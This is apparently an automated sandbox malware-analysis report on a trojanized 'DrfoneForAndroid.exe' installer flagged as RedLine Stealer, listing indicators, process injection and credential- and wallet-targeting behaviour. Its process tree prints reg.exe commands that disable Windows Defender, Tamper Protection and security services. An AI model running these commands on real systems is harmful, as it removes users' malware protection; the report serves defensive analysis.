Analysis
max time kernel: 104s
max time network: 132s
platform: windows10_x64
resource: win10v20210410
submitted: 17-04-2021 15:20
Static task: static1
Behavioral task behavioral1: Sample DrfoneForAndroid.exe, Resource win10v20210410
Behavioral task behavioral2: Sample DrfoneForAndroid.exe, Resource win10v20210410
Behavioral task behavioral3: Sample DrfoneForAndroid.exe, Resource win10v20210408
Behavioral task behavioral4: Sample DrfoneForAndroid.exe, Resource win10v20210410
Behavioral task behavioral5: Sample DrfoneForAndroid.exe, Resource win7v20210408
General
Target: DrfoneForAndroid.exe
Size: 117.0MB
MD5: d36de3e484b54d8d9864897dc93c42d5
SHA1: 8669bfcce5a0aedc82232821cf37672645bdae3a
SHA256: b3be601b4902a1ba5c0754b2f67eaed42fc7bf7560de288c8a6e0401dc112595
SHA512: 681bb7785d9847379baeb93e57f74ba188d13de312047e9c4689b96bb89f56814a02852c58f0fce45239f84b61bc10ff62ab18da7c9c9b10034482ccb5bd7a20
Malware Config
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
Executes dropped EXE 22 IoCs
Processes (pid, process):
1776 DrfoneForAndroid.tmp
1452 drfone-for-android_full1544.exe
1908 drfone-for-android_full1544.tmp
1008 7z.exe
3780 7z.exe
1816 7z.exe
2564 7z.exe
2512 7z.exe
3892 7z.exe
3896 7z.exe
3672 7z.exe
4040 7z.exe
3808 iexplore.exe
1956 ProcessKiller.exe
1144 nvnodejslauncher.exe
2216 nbdrivesllapi.exe
2256 NetFxLite.exe
3724 NetFxLite.tmp
4092 NFWCHk.exe
3660 MUIServices.exe
1596 libmfxsw32.exe
2712 libmfxsw32.exe
Processes (resource, yara_rule):
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe upx
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe upx
Loads dropped DLL 45 IoCs
Processes (pid, process):
1776 DrfoneForAndroid.tmp
1008 7z.exe
3780 7z.exe
1816 7z.exe
2564 7z.exe
2512 7z.exe
3892 7z.exe
3896 7z.exe
3672 7z.exe
4040 7z.exe
1908 drfone-for-android_full1544.tmp
2720 mscorsvw.exe
2720 mscorsvw.exe
1008 mscorsvw.exe
1008 mscorsvw.exe
1296 mscorsvw.exe
1296 mscorsvw.exe
1552 mscorsvw.exe
1552 mscorsvw.exe
3708 mscorsvw.exe
3708 mscorsvw.exe
3476 mscorsvw.exe
3476 mscorsvw.exe
3776 mscorsvw.exe
3776 mscorsvw.exe
1780 mscorsvw.exe
1780 mscorsvw.exe
932 mscorsvw.exe
932 mscorsvw.exe
4092 mscorsvw.exe
4092 mscorsvw.exe
2196 mscorsvw.exe
2196 mscorsvw.exe
3708 mscorsvw.exe
3708 mscorsvw.exe
4052 mscorsvw.exe
4052 mscorsvw.exe
3112 mscorsvw.exe
3112 mscorsvw.exe
1828 mscorsvw.exe
1828 mscorsvw.exe
3772 mscorsvw.exe
3772 mscorsvw.exe
2316 mscorsvw.exe
2316 mscorsvw.exe
Modifies file permissions 1 TTPs 3 IoCs
Processes (pid, process):
932 icacls.exe
3808 icacls.exe
3476 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Suspicious use of SetThreadContext 2 IoCs
Processes (description, pid, process, target process):
PID 3808 set thread context of 2220: 3808 iexplore.exe -> regasm.exe
PID 3660 set thread context of 2080: 3660 MUIServices.exe -> explorer.exe
Drops file in Program Files directory 64 IoCs
Processes:
drfone-for-android_full1544.tmpDrfoneForAndroid.tmpdescription ioc process File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\GIF\is-2OHLB.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Motorola\is-LHJNI.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Samsung\S8Series\is-E5D7M.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NJ55H.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-TQU4Q.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8F7TC.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JIT55.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JL272.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-383DP.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-PJDF4.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UMTHE.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-4LE3B.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\is-3JVJD.tmp DrfoneForAndroid.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\AdbWinUsbApi.dll drfone-for-android_full1544.tmp File created C:\Program Files 
(x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-7E0L8.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-5KVID.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-252CN.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8B81T.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-K1KA9.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Template\SMS\image\is-5E5U5.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-KMEQQ.tmp drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WSAppHelper.exe drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8VECQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NDEKJ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-9SV61.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JCCD5.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-G6Q7R.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CBA9U.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DO909.tmp drfone-for-android_full1544.tmp File created C:\Program Files 
(x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-BKN8S.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Htc\is-HP31H.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Xiaomi\Xiaomi\is-8PQFB.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QVKBQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-FM9CQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-1ENEO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-VC9E3.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-HJ1BK.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-82PQS.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RLA80.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-L0A2H.tmp drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\BaseConnection.dll drfone-for-android_full1544.tmp File opened for modification C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\VirtualFS.dll drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-SE1FG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-022E7.tmp drfone-for-android_full1544.tmp File 
created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-M4BNG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DQQKE.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-BNOQI.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-V4KCP.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WAF\Skin\Default\is-HG0MO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-HNT09.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-03CCC.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-GBE8O.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UGM7G.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QUA6D.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CGAGG.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-ASTNS.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-Q6SNK.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RKMSO.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QSAE3.tmp drfone-for-android_full1544.tmp File created C:\Program Files 
(x86)\Wondershare\dr.fone\Addins\SocialApps\media_pre\is-RNI97.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-2BNHF.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-KSNAQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-B6HDQ.tmp drfone-for-android_full1544.tmp File created C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-25738.tmp drfone-for-android_full1544.tmp -
Drops file in Windows directory 64 IoCs
Processes:
ngen.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exeNetFxLite.tmpmscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exemscorsvw.exengen.exengen.exemscorsvw.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exedrfone-for-android_full1544.tmpdescription ioc process File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC6DB.tmp\System.Messaging.dll mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe NetFxLite.tmp File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexf.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPB111.tmp\System.Runtime.Serialization.Formatters.Soap.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat mscorsvw.exe File opened for 
modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\installutil.exe.config NetFxLite.tmp File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index1b.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index15.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index18.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe NetFxLite.tmp File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log ngen.exe File created C:\Windows\Microsoft.NET\ngennicupdatelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index17.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created 
C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.Wrapper.dll mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index13.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File created C:\Windows\assembly\ngenlock.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock ngen.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe.config NetFxLite.tmp File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP955B.tmp\System.Xml.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9FEA.tmp\System.Data.SqlXml.dll mscorsvw.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe.config NetFxLite.tmp File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat ngen.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index11.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat mscorsvw.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_32\index19.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat ngen.exe File created C:\Windows\Fonts\is-HBN7D.tmp drfone-for-android_full1544.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process):
2232 schtasks.exe
1328 schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes (pid, process):
2084 timeout.exe
Modifies registry class 1 IoCs
Processes (description, ioc, process):
Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings DrfoneForAndroid.tmp
Processes (description, ioc, process):
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2 NFWCHk.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob = [certificate blob omitted] NFWCHk.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 nvnodejslauncher.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] nvnodejslauncher.exe
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes (pid, process):
1776 DrfoneForAndroid.tmp
1776 DrfoneForAndroid.tmp
1780 powershell.exe
1780 powershell.exe
1780 powershell.exe
3672 powershell.exe
3672 powershell.exe
3672 powershell.exe
1908 drfone-for-android_full1544.tmp
1908 drfone-for-android_full1544.tmp
1908 drfone-for-android_full1544.tmp
1908 drfone-for-android_full1544.tmp
1956 ProcessKiller.exe
2220 regasm.exe
2216 nbdrivesllapi.exe
3660 MUIServices.exe
Suspicious behavior: MapViewOfSection 1 IoCs
Processes (pid, process):
3808 iexplore.exe
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes (description, pid, process):
Token: SeDebugPrivilege 1780 powershell.exe
Token: SeRestorePrivilege 1008 7z.exe
Token: 35 1008 7z.exe
Token: SeSecurityPrivilege 1008 7z.exe
Token: SeSecurityPrivilege 1008 7z.exe
Token: SeRestorePrivilege 3780 7z.exe
Token: 35 3780 7z.exe
Token: SeSecurityPrivilege 3780 7z.exe
Token: SeSecurityPrivilege 3780 7z.exe
Token: SeRestorePrivilege 1816 7z.exe
Token: 35 1816 7z.exe
Token: SeSecurityPrivilege 1816 7z.exe
Token: SeSecurityPrivilege 1816 7z.exe
Token: SeRestorePrivilege 2564 7z.exe
Token: 35 2564 7z.exe
Token: SeSecurityPrivilege 2564 7z.exe
Token: SeSecurityPrivilege 2564 7z.exe
Token: SeRestorePrivilege 2512 7z.exe
Token: 35 2512 7z.exe
Token: SeSecurityPrivilege 2512 7z.exe
Token: SeSecurityPrivilege 2512 7z.exe
Token: SeRestorePrivilege 3892 7z.exe
Token: 35 3892 7z.exe
Token: SeSecurityPrivilege 3892 7z.exe
Token: SeSecurityPrivilege 3892 7z.exe
Token: SeRestorePrivilege 3896 7z.exe
Token: 35 3896 7z.exe
Token: SeSecurityPrivilege 3896 7z.exe
Token: SeSecurityPrivilege 3896 7z.exe
Token: SeRestorePrivilege 3672 7z.exe
Token: 35 3672 7z.exe
Token: SeSecurityPrivilege 3672 7z.exe
Token: SeSecurityPrivilege 3672 7z.exe
Token: SeRestorePrivilege 4040 7z.exe
Token: 35 4040 7z.exe
Token: SeSecurityPrivilege 4040 7z.exe
Token: SeSecurityPrivilege 4040 7z.exe
Token: SeDebugPrivilege 3672 powershell.exe
Token: SeDebugPrivilege 1956 ProcessKiller.exe
Token: SeDebugPrivilege 2220 regasm.exe
Token: SeDebugPrivilege 2216 nbdrivesllapi.exe
Token: SeDebugPrivilege 3660 MUIServices.exe
Suspicious use of FindShellTrayWindow 2 IoCs
Processes (pid, process):
1776 DrfoneForAndroid.tmp
1908 drfone-for-android_full1544.tmp
Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid, process):
3808 iexplore.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
DrfoneForAndroid.exeDrfoneForAndroid.tmpWScript.exedrfone-for-android_full1544.execmd.exedescription pid process target process PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 
3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3688 3664 cmd.exe reg.exe
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"
  PID: 744
  - Suspicious use of WriteProcessMemory
  Level 2: C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp" /SL5="$2013A,122034549,734208,C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"
    PID: 1776
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\ocIiQTVv14pHbbM\iphjManIMEPA.vbs"
      PID: 204
      - Suspicious use of WriteProcessMemory
      Level 4: C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\mevpxum30dAV.bat" "
        PID: 3664
        - Suspicious use of WriteProcessMemory
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
          PID: 1004
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
          PID: 1040
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1552
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1784
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          PID: 3784
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f
          PID: 2600
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          PID: 3756
